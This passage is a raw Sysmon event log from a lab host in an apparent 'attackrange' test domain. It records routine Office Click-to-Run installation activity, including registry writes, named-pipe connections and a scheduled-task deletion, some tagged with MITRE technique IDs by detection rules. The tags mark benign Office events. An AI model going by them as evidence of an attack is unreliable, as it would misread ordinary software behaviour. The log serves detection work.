Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.498{A7A01FEF-EBF9-607E-E70D-00000000BB01}67723952C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.482{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E70D-00000000BB01}6772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 18141800x800000000000000076872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.482{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.482{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44724268C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1481b|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f8d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.481{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\Office Feature Updates"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 13241300x800000000000000076867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sdxhelper.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000076866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{02BCC737-B171-4746-94C9-0D8A0B2C0089}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\IEAWSDC.DLL 13241300x800000000000000076865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\CategoryMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSSOAP30.DLL 13241300x800000000000000076864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSSOAP30.DLL 13241300x800000000000000076863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\CategoryCountDWORD (0x00000004) 13241300x800000000000000076862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\TypesSupportedDWORD (0x00000001) 13241300x800000000000000076861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Microsoft Office 16\TypesSupportedDWORD (0x00000007) 13241300x800000000000000076860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Microsoft Office 16\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSORES.DLL;C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE 13241300x800000000000000076859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\Microsoft Office 16 Alerts\TypesSupportedDWORD (0x00000007) 13241300x800000000000000076858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\Microsoft Office 16 Alerts\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\OFFREL.DLL 13241300x800000000000000076857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\RetentionDWORD (0x00000000) 13241300x800000000000000076856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\PrimaryModuleOAlerts 13241300x800000000000000076855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\MaxSizeDWORD (0x00020000) 13241300x800000000000000076854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\DisplayNameIDDWORD (0x00000066) 13241300x800000000000000076853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\DisplayNameFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\OFFREL.DLL 13241300x800000000000000076852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{D66DC78C-4F61-447F-942B-3FB6980118CF}{D66DC78C-4F61-447F-942B-3FB6980118CF} 13241300x800000000000000076851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{506F4668-F13E-4AA1-BB04-B43203AB3CC0}{506F4668-F13E-4AA1-BB04-B43203AB3CC0} 13241300x800000000000000076850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D66DC78C-4F61-447F-942B-3FB6980118CF}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000076849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A394DCA9-3727-11D4-BD85-00C04F6B93A4}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000076848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{506F4668-F13E-4AA1-BB04-B43203AB3CC0}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000076847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6939BF8D-FF94-492C-9E4E-BD6439D8F867}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000076846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000076845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{000D0E00-0000-0000-C000-000000001157}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000076844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{6939BF8D-FF94-492C-9E4E-BD6439D8F867}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 13241300x800000000000000076843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.467{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 18141800x800000000000000076842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 13241300x800000000000000076840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{000D0E00-0000-0000-C000-000000001157}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 13241300x800000000000000076839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Application\(Default)IExplore 13241300x800000000000000076838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\(Default)"file:%%1",,-1,,,,, 13241300x800000000000000076837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Topic\(Default)WWW_OpenURL 13241300x800000000000000076836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\command\(Default)"%%ProgramFiles%%\Internet Explorer\iexplore.exe" -nohome 13241300x800000000000000076835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F8CF7A98-2C45-4c8d-9151-2D716989DDAB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Application\(Default)IExplore 13241300x800000000000000076833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\(Default)"file:%%1",,-1,,,,, 13241300x800000000000000076832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Topic\(Default)WWW_OpenURL 13241300x800000000000000076831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\command\(Default)"%%ProgramFiles%%\Internet Explorer\iexplore.exe" -nohome 13241300x800000000000000076830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{F8CF7A98-2C45-4c8d-9151-2D716989DDAB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000076829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{355822FC-86F1-4BE8-B5F0-A33736789641}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{35C5242B-7455-4F9C-962B-369EA43ED6F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{72B66649-3DBF-429F-BD6F-7774A9784B78}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{33154C99-BF49-443D-A73C-303A23ABBE97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000076820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 10341000x800000000000000076819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-E50D-00000000BB01}2528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{355822FC-86F1-4BE8-B5F0-A33736789641}Microsoft Word Thumbnail Handler 13241300x800000000000000076817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}Microsoft Visio Thumbnail Handler 13241300x800000000000000076816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{35C5242B-7455-4F9C-962B-369EA43ED6F3}Microsoft PowerPoint Thumbnail Handler 13241300x800000000000000076815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell 